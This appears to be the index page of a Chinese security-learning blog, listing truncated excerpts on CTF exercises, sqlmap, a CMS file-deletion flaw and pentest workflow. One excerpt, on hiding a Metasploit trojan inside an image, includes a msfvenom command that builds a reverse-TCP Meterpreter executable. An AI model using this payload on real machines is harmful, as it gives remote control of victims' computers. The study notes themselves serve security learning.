YY

There's a lot of potential in the spring.

📕 152词 | 3352字

2021-08-13-ctfshowweb入门

2021-08-13-ctfshowweb入门

信息搜集 web1-20 域名信息(通过dns解析记录) 弱密码以及网站信息泄露(电话,姓名,资料等) editor泄露(小0day:某编辑器最新版默认配置下,如果目录不存在,则会遍历服务器根目录) 查看源码 F12 鼠标右键 禁用js后可以 打开一个正常的站点,f12以后粘贴url ...

2021-08-09-ctfshow做题笔记

2021-08-09-ctfshow做题笔记

作者:鸿鹄(阳阳) crypto crypto签到-14 这些题目包含了常用的密码学 rot密码 凯撒密码 jsfuck、表情密码(均可直接在控制台运行出来) OoK加密 brainfuck https://www.splitbrain.org/services/ook rsa算法 https://mp....

sqlmap使用大全

sqlmap使用大全

Sqlmap工具 一.介绍 开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。 检测方式:布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入 支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、M...

XYHCMS漏洞

XYHCMS漏洞

作者:掌控安全-柚子 一.XYHCMS 3.2 后台任意文件删除 漏洞介绍 影响版本是XYHCMS 3.2,漏洞的成因是没有对删除的文件没有做任何限制,导致可以直接把安装文件删除。 漏洞分析 打开 /App/Manage/Controller/DatabaseController.class.php 文件。 锁定 delSqlFiles()函数。 漏洞复现 1.进入后...

网络安全学习目录

网络安全学习目录

声明:《网络安全学习目录》系列的所有文章仅用于技术交流和研究使用,切勿用作其他非法用途,希望大家遵守相关法律法规,坚决抵制任何违法犯罪活动。 目录转载 https://songly.blog.csdn.net/article/details/106695042

在图片中隐藏msf木马

在图片中隐藏msf木马

首先下载一个,普通的图片,并将它转换为ico格式。 url地址:https://www.qtool.net/ico 转换后就是一个ico的图片格式。 Msfvenom生成木马 Msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=8888 -f exe >shell.exe 会在桌面生成一个一个exe文件。 ...

黑客攻击步骤

黑客攻击步骤


一套基本的渗透测试流程

一套基本的渗透测试流程

信息收集:资产收集,主机信息收集 资产收集 以搜索引擎为例: Google Hacking 其他引擎的使用与搜索:bing,baidu shadon ZoomEye fofa Google Hacking intitle: intext:...

WEB安全体系

WEB安全体系


Docker

Docker学习

Docker docker学习 DOCKER概述; DOCKER安装 DOCKER命令 镜像命令 容器命令 操作命令 ...